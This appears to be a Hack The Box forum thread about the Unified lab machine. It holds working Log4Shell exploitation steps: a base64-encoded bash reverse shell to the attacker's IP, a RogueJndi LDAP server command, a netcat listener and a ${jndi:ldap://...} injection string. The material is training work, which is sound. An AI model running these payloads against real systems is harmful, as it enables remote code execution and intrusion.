Help with creating a reverse shell in Unified

HTB Content Machines
, ,
1

I am stuck on the Unified machine in Tier 2 of starting point. I cant seem to get a reverse shell for the life of me!
After a few testing steps with tcpdump and playing around with the command that i dont think i need to elaborate on here, I tried to exploit the machine in the same way that the guide i followed told me to.

I encoded the bash reverse shell into base64, using this command:

┌──(kali㉿kali)-[~]
└─$ echo 'bash -c bash -i >&/dev/tcp/10.10.14.196/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTk2LzQ0NDQgMD4mMQo=

I setup a rogue-jndi server like this, with that reverse shell:

┌──(kali㉿kali)-[~]
└─$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMTk2LzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.14.196"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.196:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.196:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.196:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.196:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.14.196:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.196:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.196:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.196:1389/o=reference to artsploit.controllers.RemoteReference

after setting up the server, i created the netcat listener:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444        
listening on [any] 4444 ...

Finally,
I sent the command in the remember section of the POST request in burpsuite, and i got back the api.err.InvalidPayload message, which confirmed the machine was vulnerable.

screenshot
screenshot952×610 65.3 KB

When i checked back with netcat, there was no shell created :frowning:

ps: sorry if im misusing the forums lol, just lmk and ill try fix problems with my post, or tags or whatever :smiley:

2

I solved this, the correct command was “${jndi:ldap://10.10.14.196:1389/o=tomcat}”
I almost cried over a single symbol.

1 Like
3

I am having the same problem. I have attempted to pwn unified at least twice, but netcat simply hates me. I did everything the write up said, but netcat refuses to give me a shell.